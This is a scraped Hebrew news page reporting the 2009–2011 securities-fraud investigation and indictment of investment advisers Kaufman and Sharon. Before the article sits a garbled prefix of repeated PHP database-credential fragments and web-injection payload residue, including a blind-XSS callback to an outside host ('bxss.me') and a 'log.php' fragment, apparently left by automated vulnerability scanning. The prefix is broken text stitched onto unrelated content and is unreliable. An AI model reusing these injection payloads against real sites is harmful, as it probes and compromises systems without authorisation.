$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1ySf9n9nO"; ?> $db_host = "1" $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "19342244"; ?> ?>acker-9434/log.php?"; ?>{acx}}%>"; ?> $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> $db_name = "1"; ?>b_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>>'hitvtgywpoinqc09d0.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> יועצי ההשקעות קאופמן ושרון חשודים בעבירות ניירות ערך
x

דיווח על תקלה

תאור תקלה:
שם:
דואר אלקטרוני:
חיפוש באתר
מאמרים אחרונים

יועצי ההשקעות קאופמן ושרון חשודים בעבירות ניירות ערך

תאריך: 03/08/2010 15:19   מחבר: מערכת האתר

היועצים החשודים

בתקופה הרלוונטית לחקירה, ינואר 2007 עד יולי 2009, הועסקו יעקב קאופמן ונתנאל שרון כיועצי השקעות במחלקת מסחר תאגידי בבנק הבינלאומי הראשון. במסגרת עבודתם סחרו השניים באופציות, מניות ותעודות סל וכן באג"ח ממשלתיות שנסחרות בבורסה בתל-אביב.

החשד המיוחס

מחקירת רשות ניירות ערך עולה כי שני החשודים ניצלו את נגישותם לחשבונות המשויכים לתאגידים גדולים והשפיעו בדרכי תרמית על שערי ניירות ערך שבהם סחרו. כתוצאה מהחשד האמור יוחס לחשודים ביצוע עבירות של תרמית בניירות ערך, עבירות עובד חבר בורסה, קבלת דבר במירמה, בהיקף של מאות אלפי שקלים מירמה והפרת אמונים בתאגיד, הלבנת הון ועבירות על חוק הסדרת העיסוק בייעוץ השקעות.

שיטת הפעולה

היועצים החשודים  ביצעו עסקאות מתואמות בין חשבונות התאגידים שנגדם בוצעה התרמית והמעילה לבין החשבונות האישיים שלהם, כך שחשבונות התאגידים מכרו את ניירות הערך בזול לחשבונותיהם האישיים של החשודים לאחר מכן, בהפרשי זמן של דקות בודדות, קנו החשבונות של התאגידים  בחזרה את ניירות הערך במחיר גבוה יותר מהחשבונות האישיים של החשודים, תוך שינוי בשער ניירות הערך לשם קידום מטרותיהם ולשם יצירת רווחים עצמיים.

לפי ממצאי החקירה כפי שהתפרסמו בעיתונות הכלכלית נמסר כי קאופמן הפיק לעצמו רווחים בגובה של יותר ממיליון שקל על חשבון התאגידים המרומים ואילו שרון הפיק רווחים בסדר גודל של מאות אלפי שקלים.

לפי הנטען במהלך הדיון בבית המשפט, התאגידים הבולטים שנפגעו ממעשי התרמית של החשודים הם: מפעל הפיס, קרנית -  הקרן לפיצוי נפגעי תאונות דרכים, החברה לפנסיה מוקדמת וסאמיט קפיטל.

דבר השופט

החשוד קאופמן שיתף פעולה בחקירה ונשלח בהוראת בית המשפט למעצר בית ואילו שרון בחר בזכות השתיקה ומעצרו הוארך.  בהחלטתו בעניינם של החשוד השותק קבע השופט בחודש ספטמבר 2009: "ברור כי שתיקתו של החשוד בחקירתו יוצרת לחוקרים קשיים ומחייבת אותם לפעולות חקירה נוספות. אין חולק כי שחרורו של החשוד עשוי להביא לשיבוש החקירה ולתיאום עדויות עם מעורבים אחרים, שחלקם הם בני-משפחתו"".

כתב אישום

היום 02/1/11 הוגש כתב אישום נגד יועץ ההשקעות יעקב קאופמן. על פי כתב האישום, במהלך השנים 2006-2009 ניצל קאופמן את נגישותו לחשבונות של לקוחות חדר מסחר התאגידים וביניהם: מפעל הפיס, קרנית ומוסדות גדולים נוספים בעלי מסחר נפח גדול וביצע 1,373  עסקות עצמיות על חשבון לקוחות אלו, תוך שהוא גורף לכיסו למעלה מ-1.5 מיליון שקל כאמור.

העסקאות המתואמות בוצעו בעיקר בחשבונותיו הפרטיים וגם בחשבון שהיה רשום על שם אשתו, כל זאת לצורך הסוואת פעילותו הפלילית. את העסקות ביצע קאופן בשיטת הרצף אותה הכיר היטב לפי כתב האישום, במהלכה הוזרמו הוראות מתואמות של קניה ומכירה של ניירות ערך, מתוקף תפקידו כיועץ השקעות.

אישתו של קאופמן נאשמת בעבירה של עובד חבר בורסה, משום שהחשבון הפרטי העיקרי בו השתמש קאופמן היה רשום על שמה, תוך שהיא מודעת לאיסורים החלים עליה כעובדת בנק.